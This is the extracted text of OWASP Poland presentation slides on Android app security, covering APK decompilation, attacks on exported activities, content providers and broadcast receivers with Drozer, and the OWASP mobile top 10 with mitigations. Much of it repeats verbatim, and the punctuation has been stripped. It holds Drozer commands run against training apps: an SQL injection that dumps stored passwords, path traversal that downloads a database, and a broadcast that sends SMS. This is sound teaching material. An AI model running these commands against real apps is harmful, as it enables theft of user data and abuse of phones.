id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Google Play
1 2 3 4 5
Require and validate
Developer information
Review Applications
before distribution
Permanently stop
distribution
Reduce attacker flexibility
Remove applications
after installation
Apps from Unknown Sources
By default only Google Play and other pre-installed app stores are allowed to install apps
The vast majority of installs come from Google Play
Verify AppsApps are verified prior to install
Warn for or block Potentially Harmful Applications
Over 10 million installs verified every day
Verifying is on and visible when need
Core security features to build secure applicaton
bull The Android Application Sandboxbull An application framework with robust implementations of common
security functionality such as cryptography permissionsbull An encrypted file system that can be enabled to protect data on lost
or stolen devicesbull User-granted permissions to restrict access to system features and
user databull Application-defined permissions to control application data on a
per-app basis
Thank you
Any questions
Linksbull httpdeveloperandroidcomaboutdashboardsindexhtmlbull httpsdocsgooglecompresentationd1YDYUrD22Xq12nKkhBfwoJBfw2Q-OReMr0BrDfHyfyPwpub
start=falseamploop=falseampdelayms=3000ampslide=idg1202bd8e5_0193bull httpwwwcubridorgblogdev-platformandroid-at-a-glancebull httpnewssoftpediacomnewsGoogle-Introduces-Android-L-Developer-Preview-Material-Design-ART-64-Bit-Support-Volta-448367shtmlbull httpdeveloperandroidcomtoolsbuildingindexhtmlbull httpandroid-anythingdiandiancompost2011-09-285377936bull httpwwwvogellacomtutorialsAndroidarticlehtmlandroiddevelopment_artbull httpssourceandroidcomdevicestechdalvikindexhtmlbull httpsenwikipediaorgwikiAndroid_Runtimebull httpssourceandroidcomdevicestechdalvikgc-debughtmlbull httpssourceandroidcomsecurityoverviewapp-securityhtmlbull httpwwwjavatpointcominternal-details-of-hello-android-examplebull httpsdecompileandsecureapkwordpresscom20140510decompile-and-secure-android-apkbull httpdeveloperandroidcomtoolsdebuggingdebugging-memoryhtmlLogMessagesbull httpssourceandroidcomdevicesbull httpwwwcubridorgblogdev-platformandroid-at-a-glancebull httpdeveloperandroidcomtrainingarticlessecurity-tipshtmlbull httpsdeveloperandroidcomguidetopicsmanifestmanifest-introhtmlbull httpssourceandroidcomsecurityoverviewapp-securityhtmlbull httpwwwcompiletimeerrorcom201212blog-posthtmlVsReZ_krKM-bull httpwwwslidesharenetSperasoftsperasoft-talks-android-security-threatsqid=d4d0db3a-0451-4150-95e0-dcd364cc95b4ampv=qf1ampb=ampfrom_search=8bull httpwwweazytutzcomandroidandroid-architecturebull httpwwwtutorialspointcomandroidandroid_architecturehtm
Application Components Security
Alexander AntukhOWASP Poland24022016
Android Application Security
Often the app contains some sensitive databull Passwordsbull Authentication tokensbull Contactsbull Communication recordsbull IP addresses or domain names to sensitive
services
Android Application Security
Global problems in securing the applicationsbull How sensitive data is storedndash Isolationndash Privilege separation
bull How sensitive data is transmittedndash Extra-device communicationndash Inter-application communicationndash Inter-component communication
Android Application Components
Activities Services
Content providers
Broadcast
receivers
Android Application Components
AndroidManifestxml defines in which way the app works and what kind of interaction between components and outer world is possible Permissions are set there too
bull Activities ndash ltactivitygtbull Services ndash ltservicegtbull Content providers ndash ltprovidergtbull Broadcast receivers ndash ltreceivergt
Android Manifest
Sample manifest fileNote the followingbull Permissions
ltuses-permission androidname=stringgtltpermission androidprotectionLevel=hellip gt
bull Components and their attributes
AndroidManifestxml
Android Manifest
Protection levelsbull dangerous ndash increased risk (directly affect users)bull normal ndash minimal risk (default value)bull signature ndash same certificatebull signatureOrSystem ndash same certificate || app in
Android system image
Android Manifest
bull debuggablebull enabledbull exportedbull permission
Activities Services
Content provider
s
Broadcast
receivers
Example components attributes
IntentsAn intent is a defined object used for messaging that is created and communicated to an intended application component It includes all relevant information about calling application desired application component and request actionsdata
Intent intent = new Intent(IntentACTION_VIEW) intentsetData(Uriparse(httpwwwgooglecom)) String pack = comandroidbrowser ComponentName comp = new ComponentName(pack pack + BrowserActivity)intentsetComponent(comp)
startActivity(intent)
Drozer
Open source tool to interact with other applications through IPC - leading security assessment framework for Android
Manual on installation and usage
Drozer
The best thing about Drozer you donrsquot need to write your apps to interact with other apps )
dzgt run appactivitystart --action androidintentactionVIEW --data-uri httpwwwgooglecom --component comandroidbrowser comandroidbrowserBrowserActivity
DrozerIs installed in a default package of AppUse with adb so enough just bdquoclick-and-playrdquo
Activity components
An Activity provides a screen with which users can interact in order to do something Users can perform operations such as making a call sending an SMS etc
Example login screen of your Facebook app
Activities
Activity components attacks
bull If an activity can be triggered by other apps (by an attacker) it can be abused
bull Launching by intents itrsquos possible to achieve the followingndash Modify data in backgroundndash Tricking the userndash Leaking sensitive information
Activities
Activity components attacksbull General hijacking scheme
bull Results of an attackndash Malicious Activity could read the data in the Intent and then
immediately relay it to a legitimate onendash Spoofing the expected Activityrsquos user interface to steal user-supplied
data (phishing)
A B
E
Activities
Activity components attacks Activities
bull List and launch exported activities
dzgt run appactivityinfo -a commwrexamplesieve Package commwrexamplesieve commwrexamplesieveFileSelectActivity commwrexamplesieveMainLoginActivity commwrexamplesievePWList
dzgt run appactivitystart --component commwrexamplesieve commwrexamplesievePWList
Activity components demo Activities
Services
A Service can perform long-running operations in the background and does not provide a user interface Other components can bind to a Service which lets the binder invoke methods that are declared in the target Servicersquos interface Intents are used to start and bind to Services
Example playing music or downloading a file
Services
Services attacks
Although generally donrsquot seem dangerous they could potentially perform sensitive operations
To attack a service one need interaction (it must be exported or respondaccept input from message formats like intents files or the network stack)
Services
Services attacks
Typical attacks Denial of Service and Information Leakage
bull Find exported servicesbull Launch them one-by-one with logcat to check
for sensitive infobull Fire off intents and wait for it
Services
Content providers
A content provider presents data to external applications as one or more tables In other words content providers can be treated as interfaces that connect data in one process with code running in another process
Example using content providers any app can read SMS from inbuilt SMS apprsquos repository in our device
Content providers
Content providers
bull What info can they holdndash Userrsquos phone numbersndash Passwordsndash SMS
bull And one of the main problems are again permissions
run appproviderinfo --permission null
Content providers
Content providers attacks
bull Unrestricted access to app databasendash Just query it ndash run appproviderquery contentsettingssecure
bull SQL injectionbull Path traversal
Other attack vectors on auth might include altering data eg by using appproviderinsert command
Content providers
dzgt run scannerproviderinjection -a commwrexamplesieve
Content providers attacks
bull Unrestricted access to app database
Content providers
dzgt run scannerproviderfinduris -a commwrexamplesieve Accessible content URIs contentcommwrexamplesieveDBContentProviderKeys contentcommwrexamplesieveDBContentProviderPasswordscontentcommwrexamplesieveDBContentProviderPasswords
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --vertical
Content providers attacks
bull SQL injection
Content providers
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --selection unrecognized token ) (code 1) while compiling SELECT FROM Passwords WHERE ()
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --projection FROM Key--| Password | pin || thisismypassword | 9876 |
Content providers attacks
bull Path traversal
Content providers
One interesting real-life example httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-application
dzgt run appproviderread contentcommwrexamplesieveFileBackupProvideretchosts127001 localhost
dzgt run appproviderdownload contentcommwrexamplesieveFileBackupProviderdatadatacommwrexamplesie vedatabasesdatabasedb homeuserdatabasedbWritten 24576 bytes
Content providers demo Content providers
Broadcast receivers
A broadcast receiver is a component that responds to system-wide broadcast announcements such as Battery Low boot completed headset plug etc Though most of the broadcast receivers are originated by the system applications can also announce broadcasts
Broadcast receivers
Broadcast receivers
bull If receiver accepts broadcasts from untrusted sources app is at risk
Broadcast receivers
Broadcast receivers attacks
Typical fail authorization
bull Enumerate receiversbull Determine how the receiver handles the
actionbull Send intent and enjoy
Broadcast receivers
Broadcast receivers attacks
ltreceiver androidname=broadcastreceiversSendSMSNowReceiverrdquoandroidlabel=Send SMS gt ltintent-filtergt
ltaction androidname=orgowaspgoatdroidfourgoatsSOCIAL_SMS gt ltintent-filtergtltreceivergthellipltuses-permission androidname=androidpermissionSEND_SMS gt
Sample manifest from GoatDroid
Broadcast receivers
Broadcast receivers attacks
public void onReceive(Context arg0 Intent arg1) context = arg0 SmsManager sms = SmsManagergetDefault() Bundle bundle = arg1getExtras() smssendTextMessage(bundlegetString(phoneNumber) null bundlegetString(message) null null) UtilsmakeToast(context ConstantsTEXT_MESSAGE_SENT ToastLENGTH_LONG)
The following is the code that determines how the receiver handles the orgowaspgoatdroidfourgoatsSOCIAL_SMS actions
Broadcast receivers
Broadcast receivers attacks
run appbroadcastsend --action orgowaspgoatdroidfourgoatsSOCIAL_SMS --component orgowaspgoatdroidfourgoats orgowaspgoatdroidfourgoatsbroadcastreceiversSendSMSNowReceiver --extra string phoneNumber 1234567890 --extra string message PWNED
Broadcast receivers
General defenses for App Components
Applies for all abovementioned itemsbull Setting androidexported attribute to false
(only this user ID as the current app will be able to access the activity)
bull Limiting access with custom permissions for an activity (RECEIVE_SMS and others)
Referencesbull httpdeveloperandroidcomguidecomponentsindexhtmlbull httpdeveloperandroidcomguidetopicsmanifestmanifest-introhtmlbull http
resourcesinfosecinstitutecomandroid-hacking-security-part-1-exploiting-securing-application-components
bull httpresourcesinfosecinstitutecomandroid-hacking-security-part-2-content-provider-leakagebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-3-exploiting-broadcast-receiversbull httpyinzhicaoorgcoursesf15cse343443slidesmobilesecuritypdfbull httpswwwsafaribooksonlinecomlibraryviewandroid-security-cookbookbull httpswwwmwrinfosecuritycomsystemassets937originalmwri_drozer-user-guide_2015-03-23pdfbull httpsmanifestsecuritycomandroid-application-security-part-5bull httpsmanifestsecuritycomandroid-application-security-part-8bull httpswwweecsberkeleyedu~dawpapersintents-mobisys11pdfbull httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-applicationbull httpsgithubcomtanprathanMobileApp-Pentest-Cheatsheetandroid-application-penetration-testing
Thank you
bull For additional questions or just to stay in touch c0rdis
OWASP top 10 mobile risks
Pawel RzepaOWASP Poland24022016
Important notes
bull The goal of this presentation is to provide you a basic knowledge about mobile risks and easy methodology to find those risks in your applications
bull If you want to add anything importantinteresting and related to the topic ndash feel free to interrupt me )
What are we going to talk abouthellip
Before we starthellip the threat model
M2 - Insecure data storage
Insecure data storage ndash what it is
bull Simple words definition valuable pieces of data (eg passwords cookies personal information) are stored in the data-stores on the device in insecure (plain text or reversable encoding) format
Insecure data storage ndash what to look for
bull Look for any sensitive information inndash SQLite databases (local)ndash XML Data Storesndash Plain text configuration filesndash Cookie storesndash SD Card
Insecure data storage ndash how to find
bull Install and run application for some timebull Monitor changes in sdcard before and after
installing an applicationbull Analyze package files on different stages
adb pull datadataltapk_package_namegt
Insecure data storage - demo
Insecure data storage ndash real example
bull Outlook stored all attachements as unencrypted and world readable files on external storage
Insecure data storage - mitigations
bull Donrsquot store data unless itrsquos absolutely necessarry
bull Use encryption for local storage (use method setStorageEncryption)
bull For databases consider using SQLcipher for Sqlite data encryption
bull Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection ndash what it is
bull Simple words definition application does NOT implement TLS or it does incorrectly
What do you mean bdquoincorrectlyrdquo
bull Insecure implementations arendash Using known weak ciphers version (eg
SSLv2SSLv3 RC4)ndash Securing only part of the communication (eg only
authentication)ndash Lack of certificate inspection
Certificate inspection in web applications ndash chain of trustbull In web applications the validation of certificate is on the
side of a browserbull It is done by a bdquochain of trustrdquo
bull But how a mobile app can know if it is communicating with a proper server
Cert Pinning - theory
bull Embedded in source code expected X509 certificate or public key
if (presented_cert == pinned_cert)Start_connection()elseDrop_connection()
Cert Pinning - reality
bull Guys from Leibniz Universitaumlt Hannover tested 100 apps andhellip
bull 21 apps trust all certificatesbull 20 apps accept all hostnamesbull And in the end they asked developers why it
happenedhellip
More httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdf
Insufficient transport layer protection- how to find
bull Passive analysis with WiresharkBurp (to check if all traffic is encrypted)
bull Use Mallodroidmallodroidpy ndashf AppToCheckapk ndashd javaout
bull Look for end point implementation flaws using SSLyze (or httpswwwssllabscomssltest for public domain)
sslyze --regular wwwexamplecom443
Insufficient transport layer protection- example
Insufficient transport layer protection-few facts from reality
bull According to the FireEye research from July 17 2014 among 1000 most-downloaded free applications in the Google Play store
Source httpswwwfireeyecomblogthreat-research201408ssl-vulnerabilities-who-listens-when-android-applications-talkhtml
Insufficient transport layer protection- mitigationsbull Any sensitive data MUST be transfered over TLSbull How to do it properly Follow the rules https
wwwowasporgindexphpTransport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage ndash what it is
bull Simple word definition OSframeworks puts sensitive information in an insecure location in the device
bull Important note insecure data storage talks about developer conscious efforts to store data in insecure manner while unintended data leakage refers to OSframework specific quirks which can cause data leakages
Unintended data leakage ndash common leakage points
bull URL Caching bull CopyPaste buffer Cachingbull Loggingbull Analytics data sent to 3rd parties (eg ads
sending GPS location)
Unintended data leakage ndash how to find
bull Extract data from leaking content providers using Drozer
dzgt run appproviderfinduri ltpackage_namegt
bull Use logcat to verify what is being logged using ADBadb logcat [output filter]
bull Use listener (BurpWireshark) to monitor what is being sent to 3rd parties
bull Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Apps from Unknown Sources
By default only Google Play and other pre-installed app stores are allowed to install apps
The vast majority of installs come from Google Play
Verify AppsApps are verified prior to install
Warn for or block Potentially Harmful Applications
Over 10 million installs verified every day
Verifying is on and visible when need
Core security features to build secure applicaton
bull The Android Application Sandboxbull An application framework with robust implementations of common
security functionality such as cryptography permissionsbull An encrypted file system that can be enabled to protect data on lost
or stolen devicesbull User-granted permissions to restrict access to system features and
user databull Application-defined permissions to control application data on a
per-app basis
Thank you
Any questions
Linksbull httpdeveloperandroidcomaboutdashboardsindexhtmlbull httpsdocsgooglecompresentationd1YDYUrD22Xq12nKkhBfwoJBfw2Q-OReMr0BrDfHyfyPwpub
start=falseamploop=falseampdelayms=3000ampslide=idg1202bd8e5_0193bull httpwwwcubridorgblogdev-platformandroid-at-a-glancebull httpnewssoftpediacomnewsGoogle-Introduces-Android-L-Developer-Preview-Material-Design-ART-64-Bit-Support-Volta-448367shtmlbull httpdeveloperandroidcomtoolsbuildingindexhtmlbull httpandroid-anythingdiandiancompost2011-09-285377936bull httpwwwvogellacomtutorialsAndroidarticlehtmlandroiddevelopment_artbull httpssourceandroidcomdevicestechdalvikindexhtmlbull httpsenwikipediaorgwikiAndroid_Runtimebull httpssourceandroidcomdevicestechdalvikgc-debughtmlbull httpssourceandroidcomsecurityoverviewapp-securityhtmlbull httpwwwjavatpointcominternal-details-of-hello-android-examplebull httpsdecompileandsecureapkwordpresscom20140510decompile-and-secure-android-apkbull httpdeveloperandroidcomtoolsdebuggingdebugging-memoryhtmlLogMessagesbull httpssourceandroidcomdevicesbull httpwwwcubridorgblogdev-platformandroid-at-a-glancebull httpdeveloperandroidcomtrainingarticlessecurity-tipshtmlbull httpsdeveloperandroidcomguidetopicsmanifestmanifest-introhtmlbull httpssourceandroidcomsecurityoverviewapp-securityhtmlbull httpwwwcompiletimeerrorcom201212blog-posthtmlVsReZ_krKM-bull httpwwwslidesharenetSperasoftsperasoft-talks-android-security-threatsqid=d4d0db3a-0451-4150-95e0-dcd364cc95b4ampv=qf1ampb=ampfrom_search=8bull httpwwweazytutzcomandroidandroid-architecturebull httpwwwtutorialspointcomandroidandroid_architecturehtm
Application Components Security
Alexander AntukhOWASP Poland24022016
Android Application Security
Often the app contains some sensitive databull Passwordsbull Authentication tokensbull Contactsbull Communication recordsbull IP addresses or domain names to sensitive
services
Android Application Security
Global problems in securing the applicationsbull How sensitive data is storedndash Isolationndash Privilege separation
bull How sensitive data is transmittedndash Extra-device communicationndash Inter-application communicationndash Inter-component communication
Android Application Components
Activities Services
Content providers
Broadcast
receivers
Android Application Components
AndroidManifestxml defines in which way the app works and what kind of interaction between components and outer world is possible Permissions are set there too
bull Activities ndash ltactivitygtbull Services ndash ltservicegtbull Content providers ndash ltprovidergtbull Broadcast receivers ndash ltreceivergt
Android Manifest
Sample manifest fileNote the followingbull Permissions
ltuses-permission androidname=stringgtltpermission androidprotectionLevel=hellip gt
bull Components and their attributes
AndroidManifestxml
Android Manifest
Protection levelsbull dangerous ndash increased risk (directly affect users)bull normal ndash minimal risk (default value)bull signature ndash same certificatebull signatureOrSystem ndash same certificate || app in
Android system image
Android Manifest
bull debuggablebull enabledbull exportedbull permission
Activities Services
Content provider
s
Broadcast
receivers
Example components attributes
IntentsAn intent is a defined object used for messaging that is created and communicated to an intended application component It includes all relevant information about calling application desired application component and request actionsdata
Intent intent = new Intent(IntentACTION_VIEW) intentsetData(Uriparse(httpwwwgooglecom)) String pack = comandroidbrowser ComponentName comp = new ComponentName(pack pack + BrowserActivity)intentsetComponent(comp)
startActivity(intent)
Drozer
Open source tool to interact with other applications through IPC - leading security assessment framework for Android
Manual on installation and usage
Drozer
The best thing about Drozer you donrsquot need to write your apps to interact with other apps )
dzgt run appactivitystart --action androidintentactionVIEW --data-uri httpwwwgooglecom --component comandroidbrowser comandroidbrowserBrowserActivity
DrozerIs installed in a default package of AppUse with adb so enough just bdquoclick-and-playrdquo
Activity components
An Activity provides a screen with which users can interact in order to do something Users can perform operations such as making a call sending an SMS etc
Example login screen of your Facebook app
Activities
Activity components attacks
bull If an activity can be triggered by other apps (by an attacker) it can be abused
bull Launching by intents itrsquos possible to achieve the followingndash Modify data in backgroundndash Tricking the userndash Leaking sensitive information
Activities
Activity components attacksbull General hijacking scheme
bull Results of an attackndash Malicious Activity could read the data in the Intent and then
immediately relay it to a legitimate onendash Spoofing the expected Activityrsquos user interface to steal user-supplied
data (phishing)
A B
E
Activities
Activity components attacks Activities
bull List and launch exported activities
dzgt run appactivityinfo -a commwrexamplesieve Package commwrexamplesieve commwrexamplesieveFileSelectActivity commwrexamplesieveMainLoginActivity commwrexamplesievePWList
dzgt run appactivitystart --component commwrexamplesieve commwrexamplesievePWList
Activity components demo Activities
Services
A Service can perform long-running operations in the background and does not provide a user interface Other components can bind to a Service which lets the binder invoke methods that are declared in the target Servicersquos interface Intents are used to start and bind to Services
Example playing music or downloading a file
Services
Services attacks
Although generally donrsquot seem dangerous they could potentially perform sensitive operations
To attack a service one need interaction (it must be exported or respondaccept input from message formats like intents files or the network stack)
Services
Services attacks
Typical attacks Denial of Service and Information Leakage
bull Find exported servicesbull Launch them one-by-one with logcat to check
for sensitive infobull Fire off intents and wait for it
Services
Content providers
A content provider presents data to external applications as one or more tables In other words content providers can be treated as interfaces that connect data in one process with code running in another process
Example using content providers any app can read SMS from inbuilt SMS apprsquos repository in our device
Content providers
Content providers
bull What info can they holdndash Userrsquos phone numbersndash Passwordsndash SMS
bull And one of the main problems are again permissions
run appproviderinfo --permission null
Content providers
Content providers attacks
bull Unrestricted access to app databasendash Just query it ndash run appproviderquery contentsettingssecure
bull SQL injectionbull Path traversal
Other attack vectors on auth might include altering data eg by using appproviderinsert command
Content providers
dzgt run scannerproviderinjection -a commwrexamplesieve
Content providers attacks
bull Unrestricted access to app database
Content providers
dzgt run scannerproviderfinduris -a commwrexamplesieve Accessible content URIs contentcommwrexamplesieveDBContentProviderKeys contentcommwrexamplesieveDBContentProviderPasswordscontentcommwrexamplesieveDBContentProviderPasswords
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --vertical
Content providers attacks
bull SQL injection
Content providers
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --selection unrecognized token ) (code 1) while compiling SELECT FROM Passwords WHERE ()
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --projection FROM Key--| Password | pin || thisismypassword | 9876 |
Content providers attacks
bull Path traversal
Content providers
One interesting real-life example httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-application
dzgt run appproviderread contentcommwrexamplesieveFileBackupProvideretchosts127001 localhost
dzgt run appproviderdownload contentcommwrexamplesieveFileBackupProviderdatadatacommwrexamplesie vedatabasesdatabasedb homeuserdatabasedbWritten 24576 bytes
Content providers demo Content providers
Broadcast receivers
